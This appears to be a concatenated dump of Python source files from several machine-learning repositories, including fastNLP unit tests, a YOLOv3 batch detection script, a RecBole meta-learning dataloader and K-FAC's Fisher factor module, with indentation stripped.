_index = 0
_stack = []
_indices = {}
_lowlinks = {}
_onstack = defaultdict(lambda: False)
_SCCs = []
def _strongconnect(v):
nonlocal _index
_indices[v] = _index
_lowlinks[v] = _index
_index += 1
_stack.append(v)
_onstack[v] = True
for w in edges[v]:
if w not in _indices:
_strongconnect(w)
_lowlinks[v] = min(_lowlinks[v], _lowlinks[w])
elif _onstack[w]:
_lowlinks[v] = min(_lowlinks[v], _indices[w])
if _lowlinks[v] == _indices[v]:
SCC = set()
while True:
w = _stack.pop()
_onstack[w] = False
SCC.add(w)
if not (w != v):
break
_SCCs.append(SCC)
for v in vertices:
if v not in _indices:
_strongconnect(v)
return [SCC for SCC in _SCCs if len(SCC) > 1]
# https://github.com/alykhantejani/nninit/blob/master/nninit.py
def orthogonal(tensor, gain=1):
"""Fills the input Tensor or Variable with a (semi) orthogonal matrix. The input tensor must have at least 2 dimensions,
and for tensors with more than 2 dimensions the trailing dimensions are flattened. viewed as 2D representation with
rows equal to the first dimension and columns equal to the product of as a sparse matrix, where the non-zero elements
will be drawn from a normal distribution with mean=0 and std=`std`.
Reference: "Exact solutions to the nonlinear dynamics of learning in deep linear neural networks" - Saxe, A. et al.
Args:
tensor: a n-dimension torch.Tensor, where n >= 2
gain: optional gain to be applied
Examples:
>>> w = torch.Tensor(3, 5)
>>> nninit.orthogonal(w)
"""
if tensor.ndimension() < 2:
raise ValueError("Only tensors with 2 or more dimensions are supported.")
flattened_shape = (tensor.size(0), int(np.prod(tensor.detach().numpy().shape[1:])))
flattened = torch.Tensor(flattened_shape[0], flattened_shape[1]).normal_(0, 1)
u, s, v = np.linalg.svd(flattened.numpy(), full_matrices=False)
if u.shape == flattened.detach().numpy().shape:
tensor.view_as(flattened).copy_(torch.from_numpy(u))
else:
tensor.view_as(flattened).copy_(torch.from_numpy(v))
tensor.mul_(gain)
with torch.no_grad():
return tensor
def generate_step_dropout(masks, hidden_dim, step_dropout, training=False):
# assume batch first
# import pdb
# pdb.set_trace()
batch, length = masks.size()
if not training:
return torch.ones(batch, length, hidden_dim).fill_(1 - step_dropout).cuda(masks.device) * masks.view(batch,
length, 1)
masked = torch.zeros(batch, 1, hidden_dim).fill_(step_dropout)
masked = torch.bernoulli(masked).repeat(1, length, 1)
masked = masked.cuda(masks.device) * masks.view(batch, length, 1)
return masked
```
#### File: test/core/test_preprocess.py
```python
import os
import unittest
from fastNLP.core.dataset import DataSet
from fastNLP.core.preprocess import SeqLabelPreprocess
data = [
[['Tom', 'and', 'Jerry', '.'], ['n', '&', 'n', '.']],
[['Hello', 'world', '!'], ['a', 'n', '.']],
[['Tom', 'and', 'Jerry', '.'], ['n', '&', 'n', '.']],
[['Hello', 'world', '!'], ['a', 'n', '.']],
[['Tom', 'and', 'Jerry', '.'], ['n', '&', 'n', '.']],
[['Hello', 'world', '!'], ['a', 'n', '.']],
[['Tom', 'and', 'Jerry', '.'], ['n', '&', 'n', '.']],
[['Hello', 'world', '!'], ['a', 'n', '.']],
[['Tom', 'and', 'Jerry', '.'], ['n', '&', 'n', '.']],
[['Hello', 'world', '!'], ['a', 'n', '.']],
]
class TestCase1(unittest.TestCase):
def test(self):
if os.path.exists("./save"):
for root, dirs, files in os.walk("./save", topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
result = SeqLabelPreprocess().run(train_dev_data=data, train_dev_split=0.4,
pickle_path="./save")
self.assertEqual(len(result), 2)
self.assertEqual(type(result[0]), DataSet)
self.assertEqual(type(result[1]), DataSet)
os.system("rm -rf save")
print("pickle path deleted")
class TestCase2(unittest.TestCase):
def test(self):
if os.path.exists("./save"):
for root, dirs, files in os.walk("./save", topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
result = SeqLabelPreprocess().run(test_data=data, train_dev_data=data,
pickle_path="./save", train_dev_split=0.4,
cross_val=False)
self.assertEqual(len(result), 3)
self.assertEqual(type(result[0]), DataSet)
self.assertEqual(type(result[1]), DataSet)
self.assertEqual(type(result[2]), DataSet)
os.system("rm -rf save")
print("pickle path deleted")
class TestCase3(unittest.TestCase):
def test(self):
num_folds = 2
result = SeqLabelPreprocess().run(test_data=None, train_dev_data=data,
pickle_path="./save", train_dev_split=0.4,
cross_val=True, n_fold=num_folds)
self.assertEqual(len(result), 2)
self.assertEqual(len(result[0]), num_folds)
self.assertEqual(len(result[1]), num_folds)
for data_set in result[0] + result[1]:
self.assertEqual(type(data_set), DataSet)
os.system("rm -rf save")
print("pickle path deleted")
```
#### File: test/core/test_tester.py
```python
import os
import unittest
from fastNLP.core.dataset import DataSet
from fastNLP.core.field import TextField
from fastNLP.core.instance import Instance
from fastNLP.core.tester import SeqLabelTester
from fastNLP.models.sequence_modeling import SeqLabeling
data_name = "pku_training.utf8"
pickle_path = "data_for_tests"
class TestTester(unittest.TestCase):
def test_case_1(self):
model_args = {
"vocab_size": 10,
"word_emb_dim": 100,
"rnn_hidden_units": 100,
"num_classes": 5
}
valid_args = {"save_output": True, "validate_in_training": True, "save_dev_input": True,
"save_loss": True, "batch_size": 2, "pickle_path": "./save/",
"use_cuda": False, "print_every_step": 1}
train_data = [
[['a', 'b', 'c', 'd', 'e'], ['a', '@', 'c', 'd', 'e']],
[['a', '@', 'c', 'd', 'e'], ['a', '@', 'c', 'd', 'e']],
[['a', 'b', '#', 'd', 'e'], ['a', '@', 'c', 'd', 'e']],
[['a', 'b', 'c', '?', 'e'], ['a', '@', 'c', 'd', 'e']],
[['a', 'b', 'c', 'd', '$'], ['a', '@', 'c', 'd', 'e']],
[['!', 'b', 'c', 'd', 'e'], ['a', '@', 'c', 'd', 'e']],
]
vocab = {'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, '!': 5, '@': 6, '#': 7, '$': 8, '?': 9}
label_vocab = {'a': 0, '@': 1, 'c': 2, 'd': 3, 'e': 4}
data_set = DataSet()
for example in train_data:
text, label = example[0], example[1]
x = TextField(text, False)
y = TextField(label, is_target=True)
ins = Instance(word_seq=x, label_seq=y)
data_set.append(ins)
data_set.index_field("word_seq", vocab)
data_set.index_field("label_seq", label_vocab)
model = SeqLabeling(model_args)
tester = SeqLabelTester(**valid_args)
tester.test(network=model, dev_data=data_set)
# If this can run, everything is OK.
os.system("rm -rf save")
print("pickle path deleted")
``` |
{
"source": "2017ND/k-yolov3",
"score": 3
} |
#### File: 2017ND/k-yolov3/detect_all.py
```python
import os
from yolo import YOLO
from PIL import Image
def detect_img(yolo):
pic_temp = []
pic = os.listdir(test_dir)
for name in pic:
pic_temp.append(name)
for i in range(len(pic_temp)):
img = test_dir + '/' + pic_temp[i]
image = Image.open(img)
detect = yolo.detect_image(image)
# detect.show()
detect.save(target_dir + '/' + pic_temp[i])
yolo.close_session()
return detect
if __name__ == '__main__':
test_dir = './test_img'
target_dir = './detect_results'
if not os.path.exists(target_dir):
os.mkdir(target_dir)
detect_img(YOLO())
``` |
{
"source": "2017pxy/Multimodal-Meta-Learning-for-Cold-Start-Sequential-Recommendation",
"score": 3
} |
#### File: data/dataloader/meta_learning_dataloader.py
```python
from collections import OrderedDict
import numpy as np
import torch
from recbole.data.interaction import Interaction
from recbole.data.dataloader.abstract_dataloader import AbstractDataLoader
class MetaLearningDataLoader(AbstractDataLoader):
def __init__(self, config, dataset, meta_learning_dataloaders, shuffle=True):
self.meta_learning_dataloaders = meta_learning_dataloaders
self.task_name = list(meta_learning_dataloaders.keys())
super(MetaLearningDataLoader, self).__init__(config, dataset, None, shuffle)
def _init_batch_size_and_step(self):
batch_size = self.config['train_batch_size']
self.step = batch_size
self.set_batch_size(batch_size)
@property
def pr_end(self):
return len(self.task_name)
def _shuffle(self):
"""Shuffle the order of data, and it will be called by :meth:`__iter__` if self.shuffle is True.
"""
np.random.shuffle(self.task_name)
def _next_batch_data(self):
"""Assemble next batch of data in form of Interaction, and return these data.
Returns:
Interaction: The next batch of data.
"""
tasks = self.task_name[self.pr:self.pr+self.step]
self.pr += self.step
result = OrderedDict()
for task in tasks:
result[task] = self.meta_learning_dataloaders[task]
return result
``` |
{
"source": "2018233031/kfac",
"score": 2
} |
#### File: python/ops/fisher_factors.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import contextlib
import math
# Dependency imports
import numpy as np
import six
import tensorflow as tf
from collections import OrderedDict
from tensorflow.python.util import nest
from kfac.python.ops import linear_operator as lo
from tensorflow.python.training import moving_averages
from kfac.python.ops import utils
# Whether to initialize covariance estimators at a zero matrix (or the identity
# matrix).
INIT_COVARIANCES_AT_ZERO = True
# Whether to zero-debias the moving averages.
ZERO_DEBIAS = True
# Whether to initialize inverse (and other such matrices computed from the cov
# matrices) to the zero matrix (or the identity matrix). Initializing to
# zero is a safeguard against anything using the inverse before their first
# proper update, and so is preferred.
INIT_INVERSES_AT_ZERO = True
# When the number of inverses requested from a FisherFactor exceeds this value,
# the inverses are computed using an eigenvalue decomposition.
EIGENVALUE_DECOMPOSITION_THRESHOLD = 2
# Numerical eigenvalues computed from covariance matrix estimates are clipped to
# be at least as large as this value before they are used to compute inverses or
# matrix powers. Must be nonnegative.
EIGENVALUE_CLIPPING_THRESHOLD = 0.0
# When approximating conv layer input factor using spatially uncorrelated
# activations (`ConvInputSUAKroneckerfactor`) if this is True then assumes the
# activations to have zero mean.
ASSUME_ZERO_MEAN_ACTIVATIONS = False
# When approximating conv layer input factor using spatially uncorrelated
# activations (`ConvInputSUAKroneckerfactor`) if this is True then do
# mean subtraction from covariance matrix. Note this flag is only checked in the
# case where ASSUME_ZERO_MEAN_ACTIVATIONS is set to True. If
# ASSUME_ZERO_MEAN_ACTIVATIONS is False then mean is always subtracted from the
# covaraince matrix and this flag is redundant.
SUBTRACT_MEAN_CONTRIB_FROM_COV = True
# Subsample the inputs passed to the extract image patches. The number of
# inputs is normally batch_size. If _SUB_SAMPLE_INPUTS = True then
# the inputs will be randomly subsampled down to a total of
# _INPUTS_TO_EXTRACT_PATCHES_FACTOR * batch_size.
#
# Note that the value of _SUB_SAMPLE_INPUTS can be overridden locally for a
# particular layer by passing in an argument to the factor class (or the
# registration function for the corresponding layer).
_SUB_SAMPLE_INPUTS = False
_INPUTS_TO_EXTRACT_PATCHES_FACTOR = 0.2
# Subsample the extracted image patches during covariance estimation for
# input factors in conv layer. The number of patches subsampled will be
# calculated based on the following formula:
#
# if _SUB_SAMPLE_PATCHES:
# num_patches = min(_MAX_NUM_PATCHES,
# ceil(_MAX_NUM_PATCHES_PER_DIMENSION*dimension))
# else
# num_patches = total_patches
#
# where dimension is the number of rows (or columns) of the input factor matrix,
# which is typically the number of input channels times the number of pixels
# in a patch.
#
# Note that the value of _SUB_SAMPLE_PATCHES can be overridden locally for a
# particular layer by passing in an argument to the factor class (or the
# registration function for the corresponding layer).
_SUB_SAMPLE_PATCHES = False
_MAX_NUM_PATCHES = 10000000
_MAX_NUM_PATCHES_PER_DIMENSION = 3.0
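# Worked example (editor's note, not in the original source): with
# _MAX_NUM_PATCHES_PER_DIMENSION = 3.0 and a factor matrix of dimension 75
# (e.g. 3 input channels times a 5x5 patch), subsampling keeps
# min(_MAX_NUM_PATCHES, ceil(3.0 * 75)) = 225 patches per covariance update.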
# TOWER_STRATEGY can be one of "concat" or "separate". If "concat", the data
# passed to the factors from the blocks will be concatenated across towers
# (lazily via PartitionedTensor objects). Otherwise a tuple of tensors over
# towers will be passed in, and the factors will iterate over this and do the
# cov computations separately for each one, averaging the results together.
TOWER_STRATEGY = "separate"
#TOWER_STRATEGY = "concat"
# The variable scope names can be edited by passing a custom sanitizer function.
# By default the scope name is unchanged.
_GET_SANITIZED_NAME_FN = lambda x: x
def set_global_constants(init_covariances_at_zero=None,
zero_debias=None,
init_inverses_at_zero=None,
eigenvalue_decomposition_threshold=None,
eigenvalue_clipping_threshold=None,
assume_zero_mean_activations=None,
subtract_mean_contrib_from_cov=None,
sub_sample_inputs=None,
inputs_to_extract_patches_factor=None,
sub_sample_patches=None,
max_num_patches=None,
max_num_patches_per_dimension=None,
tower_strategy=None,
get_sanitized_name_fn=None):
"""Sets various global constants used by the classes in this module."""
global INIT_COVARIANCES_AT_ZERO
global ZERO_DEBIAS
global INIT_INVERSES_AT_ZERO
global EIGENVALUE_DECOMPOSITION_THRESHOLD
global EIGENVALUE_CLIPPING_THRESHOLD
global ASSUME_ZERO_MEAN_ACTIVATIONS
global SUBTRACT_MEAN_CONTRIB_FROM_COV
global _SUB_SAMPLE_INPUTS
global _INPUTS_TO_EXTRACT_PATCHES_FACTOR
global _SUB_SAMPLE_PATCHES
global _MAX_NUM_PATCHES
global _MAX_NUM_PATCHES_PER_DIMENSION
global _GET_SANITIZED_NAME_FN
global TOWER_STRATEGY
if init_covariances_at_zero is not None:
INIT_COVARIANCES_AT_ZERO = init_covariances_at_zero
if zero_debias is not None:
ZERO_DEBIAS = zero_debias
if init_inverses_at_zero is not None:
INIT_INVERSES_AT_ZERO = init_inverses_at_zero
if eigenvalue_decomposition_threshold is not None:
EIGENVALUE_DECOMPOSITION_THRESHOLD = eigenvalue_decomposition_threshold
if eigenvalue_clipping_threshold is not None:
EIGENVALUE_CLIPPING_THRESHOLD = eigenvalue_clipping_threshold
if assume_zero_mean_activations is not None:
ASSUME_ZERO_MEAN_ACTIVATIONS = assume_zero_mean_activations
if subtract_mean_contrib_from_cov is not None:
SUBTRACT_MEAN_CONTRIB_FROM_COV = subtract_mean_contrib_from_cov
if sub_sample_inputs is not None:
_SUB_SAMPLE_INPUTS = sub_sample_inputs
if inputs_to_extract_patches_factor is not None:
_INPUTS_TO_EXTRACT_PATCHES_FACTOR = inputs_to_extract_patches_factor
if sub_sample_patches is not None:
_SUB_SAMPLE_PATCHES = sub_sample_patches
if max_num_patches is not None:
_MAX_NUM_PATCHES = max_num_patches
if max_num_patches_per_dimension is not None:
_MAX_NUM_PATCHES_PER_DIMENSION = max_num_patches_per_dimension
if tower_strategy is not None:
TOWER_STRATEGY = tower_strategy
if get_sanitized_name_fn is not None:
_GET_SANITIZED_NAME_FN = get_sanitized_name_fn
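# Example usage (illustrative only; these particular values and the choice to
# override them are hypothetical, not recommended defaults):
#
#   set_global_constants(eigenvalue_clipping_threshold=1e-6,
#                        sub_sample_patches=True,
#                        tower_strategy="concat")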
def inverse_initializer(shape, dtype, partition_info=None): # pylint: disable=unused-argument
if INIT_INVERSES_AT_ZERO:
return tf.zeros(shape, dtype=dtype)
return tf.eye(num_rows=shape[0], dtype=dtype)
def covariance_initializer(shape, dtype, partition_info=None): # pylint: disable=unused-argument
if INIT_COVARIANCES_AT_ZERO:
return tf.zeros(shape, dtype=dtype)
return tf.eye(num_rows=shape[0], dtype=dtype)
def diagonal_covariance_initializer(shape, dtype, partition_info=None): # pylint: disable=unused-argument
if INIT_COVARIANCES_AT_ZERO:
return tf.zeros(shape, dtype=dtype)
return tf.ones(shape, dtype=dtype)
@contextlib.contextmanager
def maybe_place_on_device(device):
if device is not None and len(device) and TOWER_STRATEGY == "separate":
with tf.device(device):
yield
else:
yield
def compute_cov(tensor, tensor_right=None, normalizer=None):
"""Compute the empirical second moment of the rows of a 2D Tensor.
This function is meant to be applied to random matrices for which the true row
mean is zero, so that the true second moment equals the true covariance.
Args:
tensor: A 2D Tensor.
tensor_right: An optional 2D Tensor. If provided, this function computes
the matrix product tensor^T * tensor_right instead of tensor^T * tensor.
normalizer: optional scalar for the estimator (by default, the normalizer is
the number of rows of tensor).
Returns:
A square 2D Tensor with as many rows/cols as the number of input columns.
"""
if normalizer is None:
normalizer = utils.get_shape(tensor)[0]
if tensor_right is None:
cov = (
tf.matmul(tensor, tensor, transpose_a=True) / tf.cast(
normalizer, tensor.dtype))
return (cov + tf.transpose(cov)) / tf.cast(2.0, cov.dtype)
else:
return (tf.matmul(tensor, tensor_right, transpose_a=True) /
tf.cast(normalizer, tensor.dtype))
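# For example (illustrative): if `tensor` has shape [128, 64], compute_cov
# returns the symmetrized [64, 64] matrix (tensor^T tensor) / 128. With
# `tensor_right` of shape [128, 32], it instead returns the [64, 32] matrix
# (tensor^T tensor_right) / 128.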
def append_homog(tensor, homog_value=None):
"""Appends a homogeneous coordinate to the last dimension of a Tensor.
Args:
tensor: A Tensor.
homog_value: Value to append as homogeneous coordinate to the last dimension
of `tensor`. If None 1.0 is used. (Default: None)
Returns:
A Tensor identical to the input but one larger in the last dimension. The
new entries are filled with `homog_value` (or 1.0 if it is None).
"""
shape = tensor.shape.as_list()
rank = len(shape)
if any(elt is None for elt in shape):
shape = tf.concat([tf.shape(tensor)[:-1], [1]], axis=0)
else:
shape[-1] = 1
if homog_value is not None:
appendage = homog_value * tf.ones(shape, dtype=tensor.dtype)
else:
appendage = tf.ones(shape, dtype=tensor.dtype)
return tf.concat([tensor, appendage], axis=-1)
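# For example (illustrative): applied to a Tensor of shape [batch, d],
# append_homog returns a Tensor of shape [batch, d + 1] whose final column is
# all 1.0 (or `homog_value` if one is given).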
def accumulate_and_maybe_write(acc_var,
var,
tensor,
ema_decay,
weight,
should_write):
def write():
return tf.group(
var.add_to_average(acc_var.read_value_and_reset(),
decay=ema_decay,
weight=weight))
with tf.control_dependencies([acc_var.accumulate(tensor)]):
if isinstance(should_write, bool):
if should_write:
return write()
else:
return tf.no_op()
else:
return tf.cond(should_write, write, tf.no_op)
def scope_string_from_params(params):
"""Builds a variable scope string name from the given parameters.
Supported parameters are:
* tensors
* booleans
* ints
* strings
* depth-1 tuples/lists of ints
* any depth tuples/lists of tensors
Other parameter types will throw an error.
Args:
params: A parameter or list of parameters.
Returns:
A string to use for the variable scope.
Raises:
ValueError: if params includes an unsupported type.
"""
params = params if isinstance(params, (tuple, list)) else (params,)
name_parts = []
for param in params:
if param is None:
name_parts.append("None")
elif isinstance(param, (tuple, list)):
if all([isinstance(p, int) for p in param]):
name_parts.append("-".join([str(p) for p in param]))
else:
name_parts.append(scope_string_from_name(param))
elif isinstance(param, (six.string_types, int, bool)):
name_parts.append(str(param))
elif isinstance(param, (tf.Tensor, tf.Variable)):
name_parts.append(scope_string_from_name(param))
elif isinstance(param, utils.PartitionedTensor):
name_parts.append(scope_string_from_name(param.tensors))
else:
raise ValueError("Encountered an unsupported param {} of type {}".format(
param, type(param)))
return "_".join(name_parts)
def scope_string_from_name(tensor):
if isinstance(tensor, (tuple, list)):
return "__".join([scope_string_from_name(t) for t in tensor])
# "gradients/add_4_grad/Reshape:0/replica_0" ->
# "gradients_add_4_grad_Reshape_0_replica_0"
tensor_name = tensor.name.replace("/", "_").replace(":", "_")
return _GET_SANITIZED_NAME_FN(tensor_name)
def scalar_or_tensor_to_string(val):
return repr(val) if np.isscalar(val) else scope_string_from_name(val)
def list_to_string(lst):
return "_".join(val if isinstance(val, six.string_types)
else scalar_or_tensor_to_string(val) for val in lst)
def graph_func_to_id(func):
"""Returns a hashable object that represents func's computation."""
# TODO(b/74201126): replace with Topohash of func's output
return func.func_id
def graph_func_to_string(func):
# TODO(b/74201126): replace with Topohash of func's output
return list_to_string(func.func_id)
def _subsample_patches(patches, name=None):
"""Subsample a patches matrix.
Subsample an array of image patches. The number of patches subsampled will be
calculated based on the following formula:
num_patches = min(_MAX_NUM_PATCHES,
ceil(_MAX_NUM_PATCHES_PER_DIMENSION*dimension))
Args:
patches: Tensor, of shape `[total_patches, dimension]`.
name: `string`, Default (None)
Returns:
A tensor of shape `[num_patches, dimension]`.
Raises:
ValueError: If patches is not matrix-shaped.
"""
with tf.name_scope(name, "subsample", [patches]):
patches = tf.convert_to_tensor(patches)
if len(patches.shape) != 2:
raise ValueError("Input param patches must be a matrix.")
total_patches = patches.shape.as_list()[0]
dimension = patches.shape.as_list()[1]
num_patches = min(_MAX_NUM_PATCHES,
int(math.ceil(_MAX_NUM_PATCHES_PER_DIMENSION*dimension)))
if total_patches is None:
total_patches = utils.get_shape(patches)[0]
should_subsample = tf.less(num_patches, total_patches)
return tf.cond(should_subsample,
lambda: _random_tensor_gather(patches, num_patches, name),
lambda: patches)
else:
if num_patches < total_patches:
return _random_tensor_gather(patches, num_patches, name)
else:
return patches
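# Worked example (illustrative): with the default settings above
# (_MAX_NUM_PATCHES = 10000000, _MAX_NUM_PATCHES_PER_DIMENSION = 3.0), a
# patches matrix of shape [50000, 1152] (e.g. a 3x3 kernel over 128 input
# channels) gives num_patches = min(10000000, ceil(3.0 * 1152)) = 3456, so
# 3456 of the 50000 rows would be kept.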
def _random_tensor_gather(array, num_ind, name=None):
"""Samples random indices of an array (along the first dimension).
Args:
array: Tensor of shape `[batch_size, ...]`.
num_ind: int. Number of indices to sample.
name: `string`. (Default: None)
Returns:
A tensor of shape `[num_ind, ...]`.
"""
with tf.name_scope(name, "random_gather", [array]):
array = tf.convert_to_tensor(array)
total_size = array.shape.as_list()[0]
if total_size is None:
total_size = utils.get_shape(array)[0]
indices = tf.random_shuffle(tf.range(0, total_size))[:num_ind]
return tf.gather(array, indices, axis=0)
@six.add_metaclass(abc.ABCMeta)
class FisherFactor(object):
"""Base class for objects modeling factors of approximate Fisher blocks.
A FisherFactor represents part of an approximate Fisher Information matrix.
For example, one approximation to the Fisher uses the Kronecker product of two
FisherFactors A and B, F = kron(A, B). FisherFactors are composed with
FisherBlocks to construct a block-diagonal approximation to the full Fisher.
FisherFactors are backed by a single, non-trainable variable that is updated
by running FisherFactor.make_covariance_update_op(). The shape and type of
this variable is implementation specific.
Note that for blocks that aren't based on approximations, a 'factor' can
be the entire block itself, as is the case for the diagonal and full
representations.
"""
def __init__(self):
self._cov_tensor = None
self._cov = None
self._acc_cov = None
@abc.abstractproperty
def _var_scope(self):
"""Variable scope for this FisherFactor instance.
Returns:
string that uniquely identifies this FisherFactor instance.
"""
pass
@property
def name(self):
return self._var_scope
@abc.abstractproperty
def _cov_shape(self):
"""The shape of the variable backing this FisherFactor."""
pass
@abc.abstractproperty
def _num_sources(self):
"""The number of things to sum over when updating covariance variable.
The default make_covariance_update_op function will call _compute_new_cov
with indices ranging from 0 to _num_sources-1. The typical situation is
where the factor wants to sum the statistics it computes over multiple
backpropped "gradients" (typically passed in via "tensors" or
"outputs_grads" arguments).
"""
pass
@abc.abstractproperty
def _num_towers(self):
pass
@abc.abstractproperty
def _dtype(self):
"""dtype for variable backing this factor."""
pass
@abc.abstractmethod
def _partial_batch_size(self, source=0, tower=0):
"""Returns (partial) batch size associated with given source and tower."""
pass
def batch_size(self, source=0):
"""Returns (total) batch size associated with given source."""
return sum(self._partial_batch_size(source=source, tower=tower)
for tower in range(self._num_towers))
def check_partial_batch_sizes(self):
"""Ensures partial batch sizes are equal across towers and source."""
# While it could in principle be okay for different towers to have different
# batch sizes, the way the code has been written isn't compatible with this.
# Basically, the normalizations occur for each tower and then the
# results are summed across towers and divided by the number of towers.
# The only way this is correct is if the towers all have the same batch
# size.
# Should make these messages use quote characters instead of parentheses
# when the bug with quote character rendering in assertion messages is
# fixed. See b/129476712
msg = ("Inconsistent (partial) batch sizes detected for factor ({}) of type"
" {}. This can be caused by passing Tensors with the wrong sizes to "
"the registration functions, or misspecification of arguments like "
"batch_size, num_uses, or num_timesteps.".format(
self.name, utils.cls_name(self)))
partial_batch_size = self._partial_batch_size()
if self._num_sources > 1 or self._num_towers > 1:
if isinstance(partial_batch_size, int):
checks = tuple(
partial_batch_size == self._partial_batch_size(source=source,
tower=tower)
for source, tower in zip(range(self._num_sources),
range(self._num_towers)))
if not all(checks):
raise ValueError(msg)
return tf.no_op()
else:
asserts = tuple(
tf.assert_equal(partial_batch_size,
self._partial_batch_size(source=source,
tower=tower),
message=msg)
for source, tower in zip(range(self._num_sources),
range(self._num_towers)))
return tf.group(asserts)
return tf.no_op()
@property
def _cov_initializer(self):
"""Function for initializing covariance variable."""
return covariance_initializer
def instantiate_cov_variables(self):
"""Makes the internal cov variable(s)."""
assert self._cov is None
with tf.variable_scope(self._var_scope):
self._cov = utils.MovingAverageVariable(
name="cov",
shape=self._cov_shape,
dtype=self._dtype,
initializer=self._cov_initializer,
normalize_value=ZERO_DEBIAS)
self._acc_cov = utils.AccumulatorVariable(
name="acc_cov",
shape=self._cov_shape,
dtype=self._dtype)
@abc.abstractmethod
def _compute_new_cov(self, source, tower):
"""Computes minibatch-estimated covariance for a single source.
Args:
source: int in [0, self._num_sources). Which source to use when computing
the cov update.
tower: int in [0, self._num_towers). Which tower to use when computing
the cov update.
Returns:
Tensor of same shape as self.cov.
"""
pass
def _compute_total_new_cov(self):
"""Computes covariance by summing across (source, towers)."""
new_cov_contribs = []
for source in range(self._num_sources):
for tower in range(self._num_towers):
with maybe_place_on_device(self._get_data_device(tower)):
new_cov_contribs.append(self._compute_new_cov(source, tower))
new_cov = tf.add_n(new_cov_contribs) / float(self._num_towers)
# Compute average of 'new_cov' across all replicas. On a replica, each
# instance of 'new_cov' will be based on a different minibatch. This ensures
# that by the end of assign_moving_average(), all replicas see the same
# value for self._cov.
#
# Other implementations of make_covariance_update_op() that accumulate
# statistics in other variables should mimic this behavior.
#
# NOTE: communicating this matrix at every iteration is wasteful in the
# sense that we might only need fresh copies when we do the inversions.
# (Although be careful about factors [e.g. diagonal] or ops
# [e.g. multiply()] that directly use the cov vars instead of the inv vars!)
new_cov = utils.all_average(new_cov)
return new_cov
def make_covariance_update_op(self, ema_decay, ema_weight, should_write=True):
"""Constructs and returns the covariance update Op.
Args:
ema_decay: float or Tensor. The exponential moving average decay.
ema_weight: float or Tensor. The weight to put on the newly computed values.
This is typically 1.0 - ema_decay.
should_write: Python or TF bool. If True, we write the covariance to
the variable and reset the accumulator instead of just accumulating.
(Default: True)
Returns:
The op which updates the cov variable (via acc_cov).
"""
cov_tensor = self._compute_total_new_cov()
# This is kept around for non-standard applications and for debugging.
self._cov_tensor = cov_tensor
return accumulate_and_maybe_write(self._acc_cov,
self._cov,
cov_tensor,
ema_decay,
ema_weight,
should_write)
@abc.abstractmethod
def _get_data_device(self, tower):
pass
@abc.abstractmethod
def instantiate_inv_variables(self):
"""Makes the internal "inverse" variable(s)."""
pass
@abc.abstractmethod
def make_inverse_update_ops(self):
"""Create and return update ops corresponding to registered computations."""
pass
@property
def cov(self):
return self._cov.value
def get_cov_vars(self):
return [self.cov]
def get_inv_vars(self):
return []
@abc.abstractmethod
def get_cov_as_linear_operator(self):
"""Returns `LinearOperator` instance which wraps the cov matrix."""
pass
@abc.abstractmethod
def register_matpower(self, exp, damping_func):
pass
@abc.abstractmethod
def register_cholesky(self, damping_func):
pass
@abc.abstractmethod
def register_cholesky_inverse(self, damping_func):
pass
@abc.abstractmethod
def get_matpower(self, exp, damping_func):
pass
@abc.abstractmethod
def get_cholesky(self, damping_func):
pass
@abc.abstractmethod
def get_cholesky_inverse(self, damping_func):
pass
class DenseSquareMatrixFactor(FisherFactor):
"""Base class for FisherFactors that are stored as dense square matrices.
This class explicitly calculates and stores inverses of their `cov` matrices,
which must be square dense matrices.
Subclasses must implement the _compute_new_cov method, and the _var_scope and
_cov_shape properties.
"""
# TODO(b/69108481): This class (and its subclasses) should be refactored to
# serve the matrix quantities it computes as both (potentially stale)
# variables, updated by the inverse update ops, and fresh values stored in
# tensors that are recomputed once every session.run() call. Currently matpower
# and damp_inverse have the former behavior, while eigendecomposition has
# the latter.
def __init__(self):
self._matpower_by_exp_and_damping = OrderedDict() # { (float, hashable): variable }
self._matpower_registrations = set() # { (float, hashable) }
self._eigendecomp = None
self._damping_funcs_by_id = OrderedDict() # {hashable: lambda}
self._cholesky_registrations = set() # { hashable }
self._cholesky_inverse_registrations = set() # { hashable }
self._cholesky_by_damping = OrderedDict() # { hashable: variable }
self._cholesky_inverse_by_damping = OrderedDict() # { hashable: variable }
super(DenseSquareMatrixFactor, self).__init__()
def get_cov_as_linear_operator(self):
"""Returns `LinearOperator` instance which wraps the cov matrix."""
assert self.cov.shape.ndims == 2
return lo.LinearOperatorFullMatrix(self.cov,
is_self_adjoint=True,
is_square=True)
def _register_damping(self, damping_func):
damping_id = graph_func_to_id(damping_func)
if damping_id not in self._damping_funcs_by_id:
self._damping_funcs_by_id[damping_id] = damping_func
return damping_id
def register_inverse(self, damping_func):
# Just for backwards compatibility of some old code and tests
self.register_matpower(-1, damping_func)
def register_matpower(self, exp, damping_func):
"""Registers a matrix power to be maintained and served on demand.
This creates a variable and signals make_inverse_update_ops to make the
corresponding update op. The variable can be read via the method
get_matpower.
Args:
exp: float. The exponent to use in the matrix power.
damping_func: A function that computes a 0-D Tensor or a float which will
be the damping value used. i.e. damping = damping_func().
"""
if exp == 1.0:
return
damping_id = self._register_damping(damping_func)
if (exp, damping_id) not in self._matpower_registrations:
self._matpower_registrations.add((exp, damping_id))
def register_cholesky(self, damping_func):
"""Registers a Cholesky factor to be maintained and served on demand.
This creates a variable and signals make_inverse_update_ops to make the
corresponding update op. The variable can be read via the method
get_cholesky.
Args:
damping_func: A function that computes a 0-D Tensor or a float which will
be the damping value used. i.e. damping = damping_func().
"""
damping_id = self._register_damping(damping_func)
if damping_id not in self._cholesky_registrations:
self._cholesky_registrations.add(damping_id)
def register_cholesky_inverse(self, damping_func):
"""Registers an inverse Cholesky factor to be maintained/served on demand.
This creates a variable and signals make_inverse_update_ops to make the
corresponding update op. The variable can be read via the method
get_cholesky_inverse.
Args:
damping_func: A function that computes a 0-D Tensor or a float which will
be the damping value used. i.e. damping = damping_func().
"""
damping_id = self._register_damping(damping_func)
if damping_id not in self._cholesky_inverse_registrations:
self._cholesky_inverse_registrations.add(damping_id)
def get_inv_vars(self):
inv_vars = []
inv_vars.extend(self._matpower_by_exp_and_damping.values())
inv_vars.extend(self._cholesky_by_damping.values())
inv_vars.extend(self._cholesky_inverse_by_damping.values())
return inv_vars
def instantiate_inv_variables(self):
"""Makes the internal "inverse" variable(s)."""
